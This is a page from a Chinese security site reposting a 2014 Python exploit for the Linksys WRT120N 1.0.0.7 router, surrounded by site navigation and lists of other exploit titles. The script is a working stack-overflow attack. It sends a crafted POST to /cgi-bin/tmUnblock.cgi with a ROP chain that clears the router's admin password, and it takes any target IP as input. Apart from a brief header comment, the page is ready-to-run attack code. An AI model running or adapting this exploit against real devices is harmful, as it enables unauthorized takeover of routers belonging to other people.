首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
WRT120N 1.0.0.7 Stack Overflow
来源:http://www.devttys0.com 作者:Heffner 发布时间:2014-02-20  
#!/usr/bin/env python
#
# WRT120N v1.0.0.7 stack overflow, ROP to 4-byte overwrite which clears the admin password.
#
# Craig Heffner
# http://www.devttys0.com
# 2014-02-14
  
import sys
import urllib2
  
try:
    target = sys.argv[1]
except IndexError:
    print "Usage: %s <target ip>" % sys.argv[0]
    sys.exit(1)
  
url = target + '/cgi-bin/tmUnblock.cgi'
if '://' not in url:
    url = 'http://' + url
  
post_data = "period=0&TM_Block_MAC=00:01:02:03:04:05&TM_Block_URL="
post_data += "B" * 246                  # Filler
post_data += "\x81\x54\x4A\xF0"         # $s0, address of admin password in memory
post_data += "\x80\x31\xF6\x34"         # $ra
post_data += "C" * 0x28                 # Stack filler
post_data += "D" * 4                    # ROP 1 $s0, don't care
post_data += "\x80\x34\x71\xB8"         # ROP 1 $ra (address of ROP 2)
post_data += "E" * 8                    # Stack filler
  
for i in range(0, 4):
    post_data += "F" * 4                # ROP 2 $s0, don't care
    post_data += "G" * 4                # ROP 2 $s1, don't care
    post_data += "\x80\x34\x71\xB8"     # ROP 2 $ra (address of itself)
    post_data += "H" * (4-(3*(i/3)))    # Stack filler; needs to be 4 bytes except for the
                                        # last stack frame where it needs to be 1 byte (to
                                        # account for the trailing "\n\n" and terminating
                                        # NULL byte)
  
try:
    req = urllib2.Request(url, post_data)
    res = urllib2.urlopen(req)
except urllib2.HTTPError as e:
    if e.code == 500:
        print "OK"
    else:
        print "Received unexpected server response:", str(e)
except KeyboardInterrupt:
    pass
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Linksys Worm Remote Root
·Catia V5-6R2013 "CATV5_AllAppl
·Oracle Forms and Reports Remot
·SolidWorks Workgroup PDM 2014
·Eudora Qualcomm WorldMail 9.0.
·Audiotran PLS File Stack Buffe
·Linksys E-series Unauthenticat
·MediaWiki Thumb.php Remote Com
·Dexter (CasinoLoader) SQL Inje
·WRT120N 1.0.0.7 Stack Overflow
·HP Data Protector EXEC_BAR Rem
·VideoCharge Studio 2.12.3.685
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved